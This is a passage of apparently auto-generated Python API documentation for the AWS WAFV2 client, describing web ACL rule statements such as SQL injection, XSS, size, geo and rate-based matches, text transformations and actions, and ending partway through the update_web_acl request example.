include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken .
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def update_web_acl(Name=None, Scope=None, Id=None, DefaultAction=None, Description=None, Rules=None, VisibilityConfig=None, LockToken=None):
"""
Updates the specified WebACL .
A Web ACL defines a collection of rules to use to inspect and control web requests. Each rule has an action defined (allow, block, or count) for requests that match the statement of the rule. In the Web ACL, you assign a default action to take (allow, block) for any request that does not match any of the rules. The rules in a Web ACL can be a combination of the types Rule , RuleGroup , and managed rule group. You can associate a Web ACL with one or more AWS resources to protect. The resources can be Amazon CloudFront, an Amazon API Gateway API, or an Application Load Balancer.
See also: AWS API Documentation
Exceptions
:example: response = client.update_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
DefaultAction={
'Block': {}
,
'Allow': {}
},
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
